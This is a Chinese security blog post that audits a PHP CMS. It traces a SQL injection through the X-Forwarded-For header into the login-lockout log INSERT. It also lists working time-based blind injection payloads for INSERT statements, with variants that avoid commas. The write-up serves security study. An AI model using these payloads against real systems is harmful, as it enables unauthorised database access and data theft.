<!DOCTYPE html>
<html lang=en>
<head>
    <meta charset="utf-8">
    
    <title>审计某cms到insert注入技巧 | hungry and humble</title>
    
    
        <meta name="keywords" content="PHP代码审计" />
    
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1" />
    <meta name="description" content="审计这是做项目碰到的一个cms，根据特征发现github上有源码，下载进行审计。后台长这样  该漏洞成因是因为后台登陆某个存在的账户过多时会进行锁定，并将此记录到数据库中。 当锁定用户时会进入记录IP并进入logHandler类的initAndWriteLog方法，部分实现代码如下： 1234567891011121314public function initAndWriteLog(     $">
<meta property="og:type" content="article">
<meta property="og:title" content="审计某cms到insert注入技巧">
<meta property="og:url" content="https://little-gu.github.io/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/index.html">
<meta property="og:site_name" content="hungry and humble">
<meta property="og:description" content="审计这是做项目碰到的一个cms，根据特征发现github上有源码，下载进行审计。后台长这样  该漏洞成因是因为后台登陆某个存在的账户过多时会进行锁定，并将此记录到数据库中。 当锁定用户时会进入记录IP并进入logHandler类的initAndWriteLog方法，部分实现代码如下： 1234567891011121314public function initAndWriteLog(     $">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://little-gu.github.io/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/1.png">
<meta property="og:image" content="https://little-gu.github.io/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/2.png">
<meta property="og:image" content="https://little-gu.github.io/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/3.png">
<meta property="og:image" content="https://little-gu.github.io/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/4.png">
<meta property="og:image" content="https://little-gu.github.io/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/5.png">
<meta property="og:image" content="https://little-gu.github.io/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/6.png">
<meta property="og:image" content="https://little-gu.github.io/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/7.png">
<meta property="og:image" content="https://little-gu.github.io/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/8.png">
<meta property="article:published_time" content="2021-03-12T11:28:02.000Z">
<meta property="article:modified_time" content="2021-11-20T05:57:38.547Z">
<meta property="article:author" content="G7shot">
<meta property="article:tag" content="PHP代码审计">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://little-gu.github.io/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/1.png">
    

    
        <link rel="alternate" href="/atom.xml" title="hungry and humble" type="application/atom+xml" />
    

    
        <link rel="icon" href="/ckrie.jpg" />
    

    
<link rel="stylesheet" href="/libs/font-awesome/css/font-awesome.min.css">

    
<link rel="stylesheet" href="/libs/open-sans/styles.css">

    
<link rel="stylesheet" href="/libs/source-code-pro/styles.css">


    
<link rel="stylesheet" href="/css/style.css">

    
<script src="/libs/jquery/2.1.3/jquery.min.js"></script>

    
<script src="/libs/jquery/plugins/cookie/1.4.1/jquery.cookie.js"></script>

    
    
        
<link rel="stylesheet" href="/libs/lightgallery/css/lightgallery.min.css">

    
    
        
<link rel="stylesheet" href="/libs/justified-gallery/justifiedGallery.min.css">

    
    
    
    


    
        <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
<meta name="generator" content="Hexo 5.3.0"></head>

<body>
    <div id="container">
        <header id="header">
    <div id="header-main" class="header-inner">
        <div class="outer">
            <a href="/" id="logo">
                <i class="logo"></i>
                <span class="site-title">hungry and humble</span>
            </a>
            <nav id="main-nav">
                
                    <a class="main-nav-link" href="/">index</a>
                
                    <a class="main-nav-link" href="/archives">archives</a>
                
                    <a class="main-nav-link" href="/about">about</a>
                
                    <a class="main-nav-link" href="/notes">notes</a>
                
            </nav>
            
            <div id="search-form-wrap">

    <form class="search-form">
        <input type="text" class="ins-search-input search-form-input" placeholder="Search" />
        <button type="submit" class="search-form-submit"></button>
    </form>
    <div class="ins-search">
    <div class="ins-search-mask"></div>
    <div class="ins-search-container">
        <div class="ins-input-wrapper">
            <input type="text" class="ins-search-input" placeholder="Type something..." />
            <span class="ins-close ins-selectable"><i class="fa fa-times-circle"></i></span>
        </div>
        <div class="ins-section-wrapper">
            <div class="ins-section-container"></div>
        </div>
    </div>
</div>
<script>
(function (window) {
    var INSIGHT_CONFIG = {
        TRANSLATION: {
            POSTS: 'Posts',
            PAGES: 'Pages',
            CATEGORIES: 'Categories',
            TAGS: 'Tags',
            UNTITLED: '(Untitled)',
        },
        ROOT_URL: '/',
        CONTENT_URL: '/content.json',
    };
    window.INSIGHT_CONFIG = INSIGHT_CONFIG;
})(window);
</script>

<script src="/js/insight.js"></script>


</div>
        </div>
    </div>
    <div id="main-nav-mobile" class="header-sub header-inner">
        <table class="menu outer">
            <tr>
                
                    <td><a class="main-nav-link" href="/">index</a></td>
                
                    <td><a class="main-nav-link" href="/archives">archives</a></td>
                
                    <td><a class="main-nav-link" href="/about">about</a></td>
                
                    <td><a class="main-nav-link" href="/notes">notes</a></td>
                
                <td>
                    
    <div class="search-form">
        <input type="text" class="ins-search-input search-form-input" placeholder="Search" />
    </div>

                </td>
            </tr>
        </table>
    </div>
</header>

        <div class="outer">
            
            
                <aside id="sidebar">
   
        
    <div class="widget-wrap" id='categories'>
        <h3 class="widget-title">
            <span>categories</span>
            &nbsp;
            <a id='allExpand' href="#">
                <i class="fa fa-angle-double-down fa-2x"></i>
            </a>
        </h3>
        
        
        
         <ul class="unstyled" id="tree" > 
                    <li class="directory open">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder-open"></i>
                            &nbsp;
                            PHP代码审计
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2021/02/13/zzzcms/">zzzcms前台RCE</a></li>  <li class="file active"><a href="/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/">审计某cms到insert注入技巧</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            java
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2021/02/16/cc1%E9%93%BE/">cc1链</a></li>  <li class="file"><a href="/2021/03/19/cc2%E9%93%BE/">cc2链</a></li>  <li class="file"><a href="/2021/04/03/%E7%BB%93%E5%90%88%E4%B8%A4%E6%9D%A1cc%E9%93%BE%E5%88%86%E6%9E%90ysoserial%E5%AE%9E%E7%8E%B0/">结合两条cc链分析ysoserial实现</a></li>  <li class="file"><a href="/2021/04/19/cc5%E9%93%BE/">cc5链</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            注入
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2021/03/04/mssql%E6%B3%A8%E5%85%A5getshell/">mssql注入getshell</a></li>  </ul> 
                    </li> 
                    
                    <li class="directory">
                        <a href="#" data-role="directory">
                            <i class="fa fa-folder"></i>
                            &nbsp;
                            渗透
                        </a>
                         <ul class="unstyled" id="tree" >  <li class="file"><a href="/2021/06/29/non-rce-ctf%E5%A4%8D%E7%8E%B0/">non-rce-ctf复现</a></li>  </ul> 
                    </li> 
                     <li class="file"><a href="/2021/02/13/test/">test</a></li>  </ul> 
    </div>
    <script>
        $(document).ready(function() {
            var iconFolderOpenClass  = 'fa-folder-open';
            var iconFolderCloseClass = 'fa-folder';
            var iconAllExpandClass = 'fa-angle-double-down';
            var iconAllPackClass = 'fa-angle-double-up';
            // Handle directory-tree expansion:
            // 左键单独展开目录
            $(document).on('click', '#categories a[data-role="directory"]', function (event) {
                event.preventDefault();

                var icon = $(this).children('.fa');
                var expanded = icon.hasClass(iconFolderOpenClass);
                var subtree = $(this).siblings('ul');
                icon.removeClass(iconFolderOpenClass).removeClass(iconFolderCloseClass);
                if (expanded) {
                    if (typeof subtree != 'undefined') {
                        subtree.slideUp({ duration: 100 });
                    }
                    icon.addClass(iconFolderCloseClass);
                } else {
                    if (typeof subtree != 'undefined') {
                        subtree.slideDown({ duration: 100 });
                    }
                    icon.addClass(iconFolderOpenClass);
                }
            });
            // 右键展开下属所有目录
            $('#categories a[data-role="directory"]').bind("contextmenu", function(event){
                event.preventDefault();
                
                var icon = $(this).children('.fa');
                var expanded = icon.hasClass(iconFolderOpenClass);
                var listNode = $(this).siblings('ul');
                var subtrees = $.merge(listNode.find('li ul'), listNode);
                var icons = $.merge(listNode.find('.fa'), icon);
                icons.removeClass(iconFolderOpenClass).removeClass(iconFolderCloseClass);
                if(expanded) {
                    subtrees.slideUp({ duration: 100 });
                    icons.addClass(iconFolderCloseClass);
                } else {
                    subtrees.slideDown({ duration: 100 });
                    icons.addClass(iconFolderOpenClass);
                }
            })
            // 展开关闭所有目录按钮
            $(document).on('click', '#allExpand', function (event) {
                event.preventDefault();
                
                var icon = $(this).children('.fa');
                var expanded = icon.hasClass(iconAllExpandClass);
                icon.removeClass(iconAllExpandClass).removeClass(iconAllPackClass);
                if(expanded) {
                    $('#sidebar .fa.fa-folder').removeClass('fa-folder').addClass('fa-folder-open')
                    $('#categories li ul').slideDown({ duration: 100 });
                    icon.addClass(iconAllPackClass);
                } else {
                    $('#sidebar .fa.fa-folder-open').removeClass('fa-folder-open').addClass('fa-folder')
                    $('#categories li ul').slideUp({ duration: 100 });
                    icon.addClass(iconAllExpandClass);
                }
            });  
        });
    </script>

    
    <div id="toTop" class="fa fa-angle-up"></div>
</aside>
            
            <section id="main"><article id="post-审计某cms到insert注入技巧" class="article article-type-post" itemscope itemprop="blogPost">
    <div class="article-inner">
        
        
            <header class="article-header">
                
                    <div class="article-meta">
                        
    <div class="article-category">
    	<i class="fa fa-folder"></i>
        <a class="article-category-link" href="/categories/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/">PHP代码审计</a>
    </div>

                        
    <div class="article-tag">
        <i class="fa fa-tag"></i>
        <a class="tag-link-link" href="/tags/PHP%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" rel="tag">PHP代码审计</a>
    </div>

                        
    <div class="article-date">
        <i class="fa fa-calendar"></i>
        <a href="/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/">
            <time datetime="2021-03-12T11:28:02.000Z" itemprop="datePublished">2021-03-12</time>
        </a>
    </div>


                        
                            <i class="fa fa-bar-chart"></i>
                            <span id="busuanzi_container_site_pv"><span id="busuanzi_value_page_pv"></span></span>    
                        
                        
                            <div class="article-meta-button">
                                <a target="_blank" rel="noopener" href='https://github.com/zthxxx/Wiki-site/raw/writing/source/_posts/审计某cms到insert注入技巧.md'> Source </a>
                            </div>
                            <div class="article-meta-button">
                                <a target="_blank" rel="noopener" href='https://github.com/zthxxx/Wiki-site/edit/writing/source/_posts/审计某cms到insert注入技巧.md'> Edit </a>
                            </div>
                            <div class="article-meta-button">
                                <a target="_blank" rel="noopener" href='https://github.com/zthxxx/Wiki-site/commits/writing/source/_posts/审计某cms到insert注入技巧.md'> History </a>
                            </div>
                        
                    </div>
                
                
    
        <h1 class="article-title" itemprop="name">
            审计某cms到insert注入技巧
        </h1>
    

            </header>
        
        
        <div class="article-entry" itemprop="articleBody">
        
        
            
        
        
            <h2 id="审计"><a href="#审计" class="headerlink" title="审计"></a>审计</h2><p>这是做项目碰到的一个cms，根据特征发现github上有源码，下载进行审计。后台长这样</p>
<p><img src="/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/1.png" alt="1"></p>
<p>该漏洞成因是因为后台登陆某个存在的账户过多时会进行锁定，并将此记录到数据库中。<br><img src="/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/2.png" alt="2"></p>
<p>当锁定用户时会进入记录IP并进入logHandler类的initAndWriteLog方法，部分实现代码如下：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="function"><span class="keyword">function</span> <span class="title">initAndWriteLog</span>(<span class="params"></span></span></span><br><span class="line"><span class="function"><span class="params">     <span class="variable">$msg</span> = <span class="string">&quot;&quot;</span>,</span></span></span><br><span class="line"><span class="function"><span class="params">     <span class="variable">$internalKey</span> = <span class="string">&quot;&quot;</span>,</span></span></span><br><span class="line"><span class="function"><span class="params">     <span class="variable">$username</span> = <span class="string">&quot;&quot;</span>,</span></span></span><br><span class="line"><span class="function"><span class="params">     <span class="variable">$action</span> = <span class="string">&quot;&quot;</span>,</span></span></span><br><span class="line"><span class="function"><span class="params">     <span class="variable">$itemid</span> = <span class="string">&quot;&quot;</span>,</span></span></span><br><span class="line"><span class="function"><span class="params">     <span class="variable">$itemname</span> = <span class="string">&quot;&quot;</span></span></span></span><br><span class="line"><span class="function"><span class="params"> </span>) </span>&#123;</span><br><span class="line">     <span class="variable">$modx</span> = evolutionCMS();</span><br><span class="line">     ........</span><br><span class="line">     <span class="keyword">$this</span>-&gt;writeToLog();</span><br><span class="line"></span><br><span class="line">     <span class="keyword">return</span>;</span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure>
<p>然后会调用writeToLog方法写入日志：</p>
<p><img src="/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/3.png" alt="3"></p>
<p>定义$fields数组最后插入到数据库中，后面的代码应该就是遍历数组插入数据库。继续跟进getuserip的函数</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="function"><span class="keyword">function</span> <span class="title">getUserIP</span>(<span class="params"></span>) </span>&#123;</span><br><span class="line">    <span class="keyword">if</span>( array_key_exists(<span class="string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>, <span class="variable">$_SERVER</span>) &amp;&amp; !<span class="keyword">empty</span>(<span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>]) ) &#123;</span><br><span class="line">        <span class="keyword">if</span> (strpos(<span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>], <span class="string">&#x27;,&#x27;</span>)&gt;<span class="number">0</span>) &#123;</span><br><span class="line">            <span class="variable">$addr</span> = explode(<span class="string">&quot;,&quot;</span>,<span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>]);</span><br><span class="line">            <span class="keyword">return</span> trim(<span class="variable">$addr</span>[<span class="number">0</span>]);</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="keyword">return</span> <span class="variable">$_SERVER</span>[<span class="string">&#x27;HTTP_X_FORWARDED_FOR&#x27;</span>];</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="keyword">return</span> <span class="variable">$_SERVER</span>[<span class="string">&#x27;REMOTE_ADDR&#x27;</span>];</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>这里获取X_FORWARDED_FOR的值并返回，注意这里会将逗号分隔，其他的没有什么限制，所以注入的话就不能用逗号。</p>
<p>为了方便，我根据代码实现一个类似的简单功能：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="variable">$ip</span> = <span class="string">&quot;我们的payload&quot;</span>;</span><br><span class="line">    <span class="variable">$addr</span> = explode(<span class="string">&quot;,&quot;</span>,<span class="variable">$ip</span>);</span><br><span class="line">    <span class="variable">$fields</span>[<span class="string">&#x27;message&#x27;</span>] = <span class="string">&#x27;asdgas&#x27;</span>;</span><br><span class="line">    <span class="variable">$fields</span>[<span class="string">&#x27;ip&#x27;</span>] = <span class="variable">$addr</span>[<span class="number">0</span>];</span><br><span class="line">    <span class="variable">$fields</span>[<span class="string">&#x27;useragent&#x27;</span>] = <span class="string">&#x27;asdgasdg&#x27;</span>;</span><br><span class="line">    <span class="variable">$fields</span> = <span class="string">&quot;(`&quot;</span> . implode(<span class="string">&quot;`, `&quot;</span>, array_keys(<span class="variable">$fields</span>)) . <span class="string">&quot;`) VALUES(&#x27;&quot;</span> .  implode(<span class="string">&quot;&#x27;, &#x27;&quot;</span>,array_values(<span class="variable">$fields</span>)) . <span class="string">&quot;&#x27;)&quot;</span>;</span><br><span class="line">    var_dump(<span class="variable">$fields</span>);</span><br><span class="line"><span class="meta">?&gt;</span></span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>最后将$fields插入代码中执行insert语句,最后成功延时。<br><img src="/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/4.png" alt="4"></p>
<h2 id="insert注入脱坑"><a href="#insert注入脱坑" class="headerlink" title="insert注入脱坑"></a>insert注入脱坑</h2><p>这里报错注入是用不了的，只能是时间盲注加不使用逗号，其实常规注入就可以，只是本地测试发现一些小问题记录一下。</p>
<ul>
<li>逗号能使用的情况</li>
</ul>
<p>利用substr函数构造if语句即可</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">mysql&gt; insert into admin values (2,&#39;&#39;+if((substr((select user()),1,1)&#x3D;&#39;p&#39;),sleep(5),1)+&#39;&#39;,&quot;admin&quot;);</span><br><span class="line">Query OK, 1 row affected (0.00 sec)</span><br><span class="line"></span><br><span class="line">mysql&gt; insert into admin values (2,&#39;&#39;+if((substr((select user()),1,1)&#x3D;&#39;r&#39;),sleep(5),1)+&#39;&#39;,&quot;admin&quot;);</span><br><span class="line">Query OK, 1 row affected (5.01 sec)</span><br></pre></td></tr></table></figure>
<ul>
<li>不能使用逗号的情况</li>
</ul>
<p>先给出三个语句</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">insert into test values (&quot;adn&quot;,&#39;1&#39; (select case when substr((select user()) from 1 for 1)&#x3D;&#39;r&#39; then sleep(5) else 0 end) &#39;1&#39;,&quot;admin&quot;);</span><br><span class="line"></span><br><span class="line">insert into test values (&quot;adn&quot;,&#39;1&#39;+(select case when substr((select user()) from 1 for 1)&#x3D;&#39;r&#39; then sleep(5) else 0 end)+&#39;1&#39;,&quot;admin&quot;);</span><br><span class="line"></span><br><span class="line">insert into test values (&quot;adn&quot;,&#39;1&#39; and (select case when substr((select user()) from 1 for 1)&#x3D;&#39;r&#39; then sleep(5) else 0 end) and &#39;1&#39;,&quot;admin&quot;);</span><br><span class="line"></span><br></pre></td></tr></table></figure>
<p>第一个语句肯定是会报错的，原理说不上来。<br>来看第二第三个语句，前者是运算符拼接，后者是and连接，并且插入的数据也不一样，前提是能执行成功如果执行结果为0是不会插入数据库的。</p>
<p><img src="/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/5.png" alt="5"></p>
<p>但是发现一个问题：</p>
<p><img src="/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/6.png" alt="6"></p>
<p>为什么这三个语句只能有一个执行成功呢，字符在and语句中是0,个人觉得如果and语句第一个条件是0的话后面的就不会执行，mysql会直接判断为0。</p>
<p>我们换一下位置</p>
<p><img src="/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/7.png" alt="7"></p>
<p>果然第一个and语句会执行，所以当为and的时候要用insert into test values (“adn”,’1’ and (select case when substr((select user()) from 1 for 1)=’r’ then sleep(5) else 0 end) and ‘1’,”admin”);至少第一个要为数字或者是1</p>
<p>运算符+的情况为空或者数字都行<br><img src="/2021/03/12/%E5%AE%A1%E8%AE%A1%E6%9F%90cms%E5%88%B0insert%E6%B3%A8%E5%85%A5%E6%8A%80%E5%B7%A7/8.png" alt="8"></p>
<p>其实是个很简单的东西，只是在本地测试的时候犯下很多糊涂，算是记录一下长长记性，钻研问题就从小问题开始对吧。</p>

            </div>
        
        <footer class="article-footer">
        </footer>
    </div>
</article>


    
<nav id="article-nav">
    
        <a href="/2021/03/19/cc2%E9%93%BE/" id="article-nav-newer" class="article-nav-link-wrap">
            <strong class="article-nav-caption">Newer</strong>
            <div class="article-nav-title">
                
                    cc2链
                
            </div>
        </a>
    
    
        <a href="/2021/03/04/mssql%E6%B3%A8%E5%85%A5getshell/" id="article-nav-older" class="article-nav-link-wrap">
            <strong class="article-nav-caption">Older</strong>
            <div class="article-nav-title">mssql注入getshell</div>
        </a>
    
</nav>





    
    




<!-- baidu url auto push script -->
<script type="text/javascript">
    !function(){var e=/([http|https]:\/\/[a-zA-Z0-9\_\.]+\.baidu\.com)/gi,r=window.location.href,o=document.referrer;if(!e.test(r)){var n="//api.share.baidu.com/s.gif";o?(n+="?r="+encodeURIComponent(document.referrer),r&&(n+="&l="+r)):r&&(n+="?l="+r);var t=new Image;t.src=n}}(window);
</script>     
</section>
        </div>
        <footer id="footer">
    <div class="outer">
        <div id="footer-info" class="inner">
            G7shot &copy; 2021 
            <a rel="license noopener" target="_blank" href="http://creativecommons.org/licenses/by-nc-nd/4.0/"><img alt="Creative Commons License" style="border-width:0" src="https://i.creativecommons.org/l/by-nc-nd/4.0/80x15.png" /></a>
            <br> Powered by g7shot.com</a>
            
                <br>
                <span id="busuanzi_container_site_pv"><i class="fa fa-eye"></i> <span id="busuanzi_value_site_pv"></span></span>
                &nbsp;|&nbsp;
                <span id="busuanzi_container_site_pv"><i class="fa fa-user"></i> <span id="busuanzi_value_site_uv"></span></span>
            
        </div>
    </div>
</footer>

        

    
        
<script src="/libs/lightgallery/js/lightgallery.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-thumbnail.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-pager.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-autoplay.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-fullscreen.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-zoom.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-hash.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-share.min.js"></script>

        
<script src="/libs/lightgallery/js/lg-video.min.js"></script>

    
    
        
<script src="/libs/justified-gallery/jquery.justifiedGallery.min.js"></script>

    
    
        <script type="text/x-mathjax-config">
    MathJax.Hub.Config({
        tex2jax: {
            inlineMath: [ ["$","$"], ["\\(","\\)"] ],
            skipTags: ['script', 'noscript', 'style', 'textarea', 'pre', 'code'],
            processEscapes: true,
            TeX: {
                equationNumbers: {
                  autoNumber: 'AMS'
                }
            }
        }
    });
    MathJax.Hub.Queue(function() {
        var all = MathJax.Hub.getAllJax();
        for (var i = 0; i < all.length; ++i)
            all[i].SourceElement().parentNode.className += ' has-jax';
    });
</script>
<script async src="//cdnjs.cloudflare.com/ajax/libs/mathjax/2.7.1/MathJax.js?config=TeX-AMS-MML_HTMLorMML"></script>
    



<!-- Custom Scripts -->

<script src="/js/main.js"></script>


    </div>
</body>
</html>